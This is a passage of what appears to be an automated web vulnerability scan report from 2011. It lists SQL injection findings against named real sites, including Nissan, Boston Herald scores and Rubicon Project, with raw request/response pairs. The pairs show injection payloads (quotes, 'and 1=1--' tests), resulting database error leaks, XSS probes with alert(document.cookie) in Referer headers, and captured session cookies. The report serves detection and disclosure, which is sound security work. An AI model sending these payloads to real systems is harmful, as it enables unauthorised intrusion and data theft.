Host: local.nissanusa.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2010; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; dcc=39942763.226884546; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; visitStart=1; s_sq=%5B%5BB%5D%5D; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.2.10.1296235644

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 01:44:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 01:44:25 GMT
Connection: close
Content-Length: 86332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
32="";

s.eVar48="CrossRegional";
// fire call to omniture
pingOmn();
}

function errorEvent() {
omnFlushObj();
// set variables as required
s.pageName="Regional_Contact_Dealer_"+region+"_Error_FeaLocOffers ";

...[SNIP]...

Request 2

GET /zip.aspx?regionalZipCode=null%2527%2527&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1
Host: local.nissanusa.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_fv=flash%2010; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; dcc=39942763.226884546; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; visitStart=1; s_sq=%5B%5BB%5D%5D; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.2.10.1296235644

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 01:44:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 01:44:26 GMT
Connection: close
Content-Length: 16098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

1.19. http://local.nissanusa.com/zip.aspx [vehicle parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/zip.aspx

Issue detail

The vehicle parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the vehicle parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /zip.aspx?regionalZipCode=null&vehicle=versa-hatchback'&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Fri, 28 Jan 2011 16:59:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:59:39 GMT
Content-Length: 5818
Connection: close
Set-Cookie: PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
</div>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '27'
AND a.version = 'en'
AND ac.category_page='ZPA'
AND' at line 5

Request 2

GET /zip.aspx?regionalZipCode=null&vehicle=versa-hatchback''&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Fri, 28 Jan 2011 16:59:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:59:39 GMT
Content-Length: 15976
Connection: close
Set-Cookie: PHPSESSID=s9eoga6caogtb5dnhcsqkqej14; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

1.20. http://nl.imlive.com/waccess/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://nl.imlive.com
Path:	/waccess/

Issue detail

Request 1

GET /waccess'/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:27 GMT
Connection: close
Content-Length: 63
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

Request 2

GET /waccess''/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: inl=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTQDQC=DLPLFJMAFKGAEJJBLHMDPHAI; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:28 GMT
Connection: close
Content-Length: 8441
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

1.21. http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx [team parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://scores.heraldinteractive.com
Path:	/aspdata/clients/herald/game.aspx

Issue detail

The team parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the team parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /aspdata/clients/herald/game.aspx?team=028' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:09 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8703

<html>
<head>
<title>Unclosed quotation mark before the character string '028''.<br>Line 1: Incorrect syntax near '028''.</title>
<style>
body {font-family:"Verdana";f
...[SNIP]...

1.22. http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx [team parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://scores.heraldinteractive.com
Path:	/aspdata/clients/herald/nbagame.aspx

Issue detail

The team parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the team parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /aspdata/clients/herald/nbagame.aspx?team=092' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:02 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8732

<html>
<head>
<title>Unclosed quotation mark before the character string '092',1'.<br>Line 1: Incorrect syntax near '092',1'.</title>
<style>
body {font-family:"Verdan
...[SNIP]...

Request 2

GET /aspdata/clients/herald/nbagame.aspx?team=092'' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:04 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1245

document.write('<TABLE BORDER="0" CELLPADDING="1" CELLSPACING="2" width="100%"><TR><TH width="40%" class="TSN6" align="left">1/28 10:30 PM ET</th><TH width="10%" class="TSN2" align="center">1</th><TH
...[SNIP]...

1.23. http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx [team parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://scores.heraldinteractive.com
Path:	/aspdata/clients/herald/nflgame.aspx

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /aspdata/clients/herald/nflgame.aspx?team=077' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:08 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8709

<html>
<head>
<title>Unclosed quotation mark before the character string '077''.<br>Line 1: Incorrect syntax near '077''.</title>
<style>
body {font-family:"Verdana";f
...[SNIP]...

Request 2

GET /aspdata/clients/herald/nflgame.aspx?team=077'' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:09 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1814

document.write('<TABLE BORDER="0" CELLPADDING="1" CELLSPACING="2" width="100%"><tr><TH width="40%" class="TSN6" align="left">Final </th><TH width="10%" align="center" Class="TSN2">1</th><TH width="10%
...[SNIP]...

1.24. http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx [team parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://scores.heraldinteractive.com
Path:	/aspdata/clients/herald/nhlgame.aspx

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /aspdata/clients/herald/nhlgame.aspx?team=121' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:17 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8732

<html>
<head>
<title>Unclosed quotation mark before the character string '121',1'.<br>Line 1: Incorrect syntax near '121',1'.</title>
<style>
body {font-family:"Verdan
...[SNIP]...

Request 2

GET /aspdata/clients/herald/nhlgame.aspx?team=121'' HTTP/1.1
Host: scores.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 29 Jan 2011 01:55:19 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1659

document.write('<TABLE BORDER="0" CELLPADDING="1" CELLSPACING="2" width="100%"><tr><TH width="40%" class="TSN6" align="left">Final </th><TH width="10%" align="center" Class="TSN2">1</th><TH width="10%
...[SNIP]...

1.25. http://tap.rubiconproject.com/oz/sensor [au cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The au cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the au cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5804/7477&cd=false&xt=17&k=photos:102,5+wrinkle:64,daily+news:64,wrinkle+trick:64,77+hr:64,dallas+mom's:64,mom's+5:64,dallas+local:64,makes+77:64,mom+makes:64,local+mom:64,photo:55,dallas:48,news:42,stars:32,dallas+mom:32,look+phenomenal:32,caught+without:32,without+makeup:32,stars+caught:32,player+news:32,life+style:32,news+front:32,red+carpet:32,daily+new:32,mom+make:32,star:26,2011:24,high+school:24,honored+tradition:24,sundance+film:24,film+festival:24,festival+2011:24,time+honored:24,dalla:24,sunny+socal:24,stars+leave:24,leave+sunny:24,2011+daily:24,new:21,&rd=burp&t=Page+Not+Found HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239'%20and%201%3d1--%20; put_1197=3271971346728586924; put_1994=6ch47d7o8wtv; xdp_ti="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; cd=false; dq=14|4|10|0; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; rdk15=0; ses15=7477^6; csi15=3174529.js^2^1296226115^1296226129&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; put_1185=3011330574290390485; rdk=5804/7477; rdk2=0; ses2=7477^6; csi2=3138805.js^2^1296224077^1296226130&3174527.js^2^1296226121^1296226125&3178295.js^1^1296226112^1296226112; put_1986=4760492999213801733; rpb=4214%3D1%264894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1; put_2132=D8DB51BF08484217F5D14AB47F4002AD

Response 1

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:02:01 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:02:01 GMT; Path=/
Set-Cookie: dq=15|4|11|0; Expires=Sat, 28-Jan-2012 17:02:01 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=5804/7477&cd=false&xt=17&k=photos:102,5+wrinkle:64,daily+news:64,wrinkle+trick:64,77+hr:64,dallas+mom's:64,mom's+5:64,dallas+local:64,makes+77:64,mom+makes:64,local+mom:64,photo:55,dallas:48,news:42,stars:32,dallas+mom:32,look+phenomenal:32,caught+without:32,without+makeup:32,stars+caught:32,player+news:32,life+style:32,news+front:32,red+carpet:32,daily+new:32,mom+make:32,star:26,2011:24,high+school:24,honored+tradition:24,sundance+film:24,film+festival:24,festival+2011:24,time+honored:24,dalla:24,sunny+socal:24,stars+leave:24,leave+sunny:24,2011+daily:24,new:21,&rd=burp&t=Page+Not+Found HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239'%20and%201%3d2--%20; put_1197=3271971346728586924; put_1994=6ch47d7o8wtv; xdp_ti="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; cd=false; dq=14|4|10|0; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; rdk15=0; ses15=7477^6; csi15=3174529.js^2^1296226115^1296226129&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; put_1185=3011330574290390485; rdk=5804/7477; rdk2=0; ses2=7477^6; csi2=3138805.js^2^1296224077^1296226130&3174527.js^2^1296226121^1296226125&3178295.js^1^1296226112^1296226112; put_1986=4760492999213801733; rpb=4214%3D1%264894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1; put_2132=D8DB51BF08484217F5D14AB47F4002AD

Response 2

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:02:01 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

1.26. http://tap.rubiconproject.com/oz/sensor [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19372086%20or%201%3d1--%20 and 19372086%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=5804/7477&cd=false&xt=15&k=photos:102,daily+news:64,photo:55,news:42,red+carpet:32,news+front:32,life+style:32,stars:32,daily+new:32,player+news:32,stars+caught:32,without+makeup:32,caught+without:32,look+phenomenal:32,star:26,2011+daily:24,leave+sunny:24,stars+leave:24,2011:24,high+school:24,time+honored:24,festival+2011:24,film+festival:24,sundance+film:24,sunny+socal:24,honored+tradition:24,new:21,submit:20,daily:20,sports:20,blogs:18,celebrity:16,world:16,errorpage:16,columnists:14,fashion:14,celebs:14,time:14,blog:13,caught:12,&rd=burp&t=Page+Not+Found&119372086%20or%201%3d1--%20=1 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; put_1986=4760492999213801733; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; put_1994=6ch47d7o8wtv; cd=false; dq=11|2|9|0; xdp_ti="26 Jan 2011 20:13:41 GMT"; lm="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; put_1185=3011330574290390485; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; ses15=7477^2; csi15=3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rdk=5804/7477; ses2=7477^2; csi2=3138805.js^1^1296224077^1296224077; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1%265328%3D1%264554%3D1; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb

Response 1

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:02:09 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:02:10 GMT; Path=/
Set-Cookie: dq=12|2|10|0; Expires=Sat, 28-Jan-2012 17:02:10 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=5804/7477&cd=false&xt=15&k=photos:102,daily+news:64,photo:55,news:42,red+carpet:32,news+front:32,life+style:32,stars:32,daily+new:32,player+news:32,stars+caught:32,without+makeup:32,caught+without:32,look+phenomenal:32,star:26,2011+daily:24,leave+sunny:24,stars+leave:24,2011:24,high+school:24,time+honored:24,festival+2011:24,film+festival:24,sundance+film:24,sunny+socal:24,honored+tradition:24,new:21,submit:20,daily:20,sports:20,blogs:18,celebrity:16,world:16,errorpage:16,columnists:14,fashion:14,celebs:14,time:14,blog:13,caught:12,&rd=burp&t=Page+Not+Found&119372086%20or%201%3d2--%20=1 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
